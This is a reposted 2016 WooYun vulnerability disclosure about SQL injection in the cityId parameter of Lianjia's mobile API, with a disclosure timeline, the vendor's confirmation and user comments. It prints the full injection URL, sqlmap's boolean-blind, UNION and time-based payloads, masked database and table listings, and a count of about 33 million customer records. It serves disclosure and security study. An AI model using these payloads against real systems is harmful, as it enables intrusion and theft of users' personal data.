链家网存在SQL注入漏洞(主站数据库/3300万用户)

admin
admin
admin
104722
文章
87
评论
2017年4月17日18:48:58评论293 views字数 211阅读0分42秒阅读模式
摘要

2016-04-18: 细节已通知厂商并且等待厂商处理中
2016-04-20: 厂商已经确认,细节仅向厂商公开
2016-04-30: 细节向核心白帽子及相关领域专家公开
2016-05-10: 细节向普通白帽子公开
2016-05-20: 细节向实习白帽子公开
2016-06-04: 细节向公众公开

漏洞概要 关注数(118) 关注此漏洞

缺陷编号: WooYun-2016-197762

漏洞标题: 链家网存在SQL注入漏洞(主站数据库/3300万用户)

相关厂商: 链家网

漏洞作者: 猪猪侠链家网存在SQL注入漏洞(主站数据库/3300万用户)

提交时间: 2016-04-18 12:28

公开时间: 2016-06-04 23:10

漏洞类型: SQL注射漏洞

危害等级: 高

自评Rank: 20

漏洞状态: 厂商已经确认

漏洞来源:www.wooyun.org ,如有疑问或需要帮助请联系

Tags标签: 无

15人收藏

漏洞详情

披露状态:

2016-04-18: 细节已通知厂商并且等待厂商处理中
2016-04-20: 厂商已经确认,细节仅向厂商公开
2016-04-30: 细节向核心白帽子及相关领域专家公开
2016-05-10: 细节向普通白帽子公开
2016-05-20: 细节向实习白帽子公开
2016-06-04: 细节向公众公开

简要描述:

链家网存在SQL注入漏洞,主站数据库,可UNION,影响3300万用户信息

详细说明:

#1 影响服务器

http://m.api.lianjia.com

#2 注入点

http://m.api.lianjia.com/web/ershoufang/sidebar?callback=jQuery1111010487171867862344_1460815277788&cityId=320100&id=320100&uuid=62bf4246-294e-457f-9790-8bc572c0886f&ucid=&type=city&_=1460815277789

#3 注入参数

cityId

漏洞证明:

code 区域 
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
 ---
 Parameter: cityId (GET)
     Type: boolean-based blind
     Title: AND boolean-based blind - WHERE or HAVING clause
     Payload: callback=jQuery111104495485157240182_1460843660050&cityId=120000) AND 2210=2210 AND (5341=5341&id=120000&type=city&_=1460843660051
 
     Type: UNION query
     Title: MySQL UNION query (NULL) - 7 columns
     Payload: callback=jQuery111104495485157240182_1460843660050&cityId=120000) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x716b716271,0x4b566d736b4677585a46,0x716a7a7071)#&id=120000&type=city&_=1460843660051
 
     Type: AND/OR time-based blind
     Title: MySQL > 5.0.11 AND time-based blind
     Payload: callback=jQuery111104495485157240182_1460843660050&cityId=120000) AND SLEEP(5) AND (2001=2001&id=120000&type=city&_=1460843660051
 ---
 [12:24:27] [INFO] the back-end DBMS is MySQL
 back-end DBMS: MySQL 5.0.11
code 区域 
available databases [8]:
mask 区域
*****ssio*****
 *****aic*****
 *****dic*****
 *****tion_s*****
 *****ian*****
 *****esmg*****
 *****est*****
 *****ser*****

code 区域 
Database:
mask 区域
*****nj*****
 *****tab*****
 *****----------*****
 *****          *****
 *****          *****
 *****          *****
 *****          *****
 *****          *****
 *****          *****
 *****          *****
 *****          *****
 *****          *****
 *****          *****
 *****ew        *****
 *****y         *****
 *****          *****
 *****          *****
 *****          *****
 *****          *****
 *****          *****
 *****          *****
 *****          *****
 *****d         *****
 *****          *****
 *****          *****
 *****          *****
 *****          *****
 *****          *****
 *****          *****
 *****ds        *****
 *****          *****
 *****          *****
 *****g_code    *****
 *****          *****
 *****n         *****
 *****          *****
 *****          *****
 *****          *****
 *****          *****
 *****nt        *****
 *****relation  *****
 *****relation_n*****
 *****ld        *****
 *****          *****
 *****nt        *****
 *****          *****
 *****ry        *****
 *****          *****
 *****          *****
 *****          *****
 *****          *****
 *****          *****
 *****          *****
 *****t         *****
 *****nts       *****
 *****se        *****
 *****e         *****
 *****e_picture *****
 *****ord       *****
 *****          *****
 *****          *****
 *****          *****
 *****on        *****
 *****          *****
 *****house     *****
 *****resblock  *****
 *****          *****
 *****_city     *****
 *****ndency    *****
 *****ess       *****
 *****          *****
 *****mment     *****
 *****rite      *****
 *****          *****
 *****          *****
 *****t         *****
 *****t_setting *****
 *****lect      *****
 *****account   *****
 *****transactio*****
 *****ion_activi*****
 *****ion_activi*****
 *****ion_code  *****
 *****ion_histor*****
 *****ion_reward*****
 *****          *****
 *****category  *****
 *****history   *****
 *****n         *****
 *****          *****
 *****          *****
 *****          *****
 *****ate       *****
 *****          *****
 *****classify  *****
 *****image     *****
 *****state     *****
 *****          *****
 *****          *****
 *****nt        *****
 *****          *****
 *****age       *****
 *****          *****
 *****p         *****
 *****          *****
 *****          *****
 *****signup    *****
 *****state     *****
 *****          *****
 *****age       *****
 *****          *****
 *****          *****
 *****          *****
 *****          *****
 *****          *****
 *****          *****
 *****          *****
 *****          *****
 *****          *****
 *****          *****
 *****          *****
 *****          *****
 *****g_group   *****
 *****_quality  *****
 *****_quality  *****
 *****uality    *****
 *****_quality  *****
 *****k_agent   *****
 *****k_quality *****
 *****gent      *****
 *****          *****
 *****          *****
 *****0160314   *****
 *****016314    *****
 *****          *****
 *****          *****
 *****t_lib     *****
 *****          *****
 *****          *****
 *****t_detail  *****
 *****g         *****
 *****l         *****
 *****          *****
 *****t         *****
 *****          *****
 *****ontent    *****
 *****          *****
 *****l         *****
 *****          *****
 *****          *****
 *****          *****
 *****          *****
 *****_agent    *****
 *****          *****
 *****          *****
 *****nu        *****
 *****          *****
 *****          *****
 *****          *****
 *****enu       *****
 *****          *****
 *****          *****
 *****          *****
 *****_zhuanjia *****
 *****          *****
 *****elation   *****
 *****ags       *****
 *****og        *****
 *****y         *****
 *****          *****
 *****          *****

code 区域 
[12:30:00] [INFO] retrieved: 33318624
 Database: lianjia
 +---------------+---------+
 | Table         | Entries |
 +---------------+---------+
 | customer_info | 33318624 |
 +---------------+---------+

修复方案:

版权声明:转载请注明来源 猪猪侠@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2016-04-20 23:00

厂商回复:

感谢!

最新状态:

暂无

漏洞评价:

对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):

登陆后才能进行评分

评价

  1. 2016-04-18 12:38 | y1ngz1 ( 路人 | Rank:23 漏洞数:5 | 一起交流,一起学习~ email:..)

    2

    我只想到了 欢乐喜剧人 2333333333333333333

  2. 2016-04-18 12:39 | 87技术联盟-Jack ( 路人 | Rank:12 漏洞数:6 | 来自于浩瀚网络中的小白!)

    0

    6666666

  3. 2016-04-18 12:42 | ning1022 ( 普通白帽子 | Rank:183 漏洞数:74 | 技术万能,技术万万不能!)

    0

    好强!!

  4. 2016-04-18 12:46 | Nan3r ( 实习白帽子 | Rank:44 漏洞数:16 | 没有简介)

    0

    前排

  5. 2016-04-18 12:47 | Q1NG ( 普通白帽子 | Rank:148 漏洞数:27 | 临 兵 斗 者 皆 阵 列 前 行 !)

    1

    心疼我大鸟哥

  6. 2016-04-18 12:48 | 西西 ( 普通白帽子 | Rank:1074 漏洞数:281 | 工欲善其事,必先利其器。)

    0

    前排混脸熟。

  7. 2016-04-18 13:03 | 阿狸 ( 路人 | Rank:14 漏洞数:4 | 小独孤)

    0

    前排混脸熟。

  8. 2016-04-18 13:03 | shlhack‘s bother ( 普通白帽子 | Rank:395 漏洞数:139 | 以前有个梦,后来我醒了)

    0

    卧槽,帮我查查我的密码

  9. 2016-04-18 13:35 | 凌风 ( 实习白帽子 | Rank:92 漏洞数:36 | 像风一样无声)

    0

    只想说666

  10. 2016-04-18 13:40 | sky666 ( 普通白帽子 | Rank:184 漏洞数:50 )

    0

    666,猪猪侠大神,你最近挖的洞真多。

  11. 2016-04-18 18:50 | 小挺 ( 实习白帽子 | Rank:45 漏洞数:15 | 在读大三学生,来找工作!)

    0

    太6了!!!

  12. 2016-04-19 10:04 | 岛云首席鉴黄师 ( 普通白帽子 | Rank:490 漏洞数:133 | 乌云核心绿帽子 《绿帽子讲婚姻安全》作者)

    0

    心疼鸟哥

  13. 2016-04-19 16:32 | 雷锋 ( 路人 | Rank:12 漏洞数:2 )

    0

    这个必须赞!!!!!!

  14. 2016-04-20 23:28 | hkcs ( 实习白帽子 | Rank:56 漏洞数:9 | 只是路过)

    1

    666

  15. 2016-04-21 07:31 | 倦意 ( 普通白帽子 | Rank:128 漏洞数:44 | 不言不语的都是好风景。)

    0

    a

  16. 2016-04-21 08:22 | Dotaer ( 路人 | Rank:28 漏洞数:8 | 多学习,多挖洞!)

    0

    看喜剧人的时候就去挖了下,好像有注入!之后光看喜剧人了.....

  17. 2016-04-21 09:54 | dragon110 ( 路人 | Rank:12 漏洞数:6 | 其实我是龙6)

    0

    66666

  18. 2016-04-22 09:53 | 阿笑 ( 路人 | Rank:10 漏洞数:2 | 只是想要一个帐号)

    0

    献上膝盖

  19. 2016-06-04 23:22 | Dusk ( 实习白帽子 | Rank:35 漏洞数:20 )

    0

    猪哥好拼

  20. 2016-06-04 23:54 | Martial ( 普通白帽子 | Rank:2639 漏洞数:370 | 竟然还有人冒充我,醉了,骗子QQ445697541...)

    0

    猪哥的裤子又强大了

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin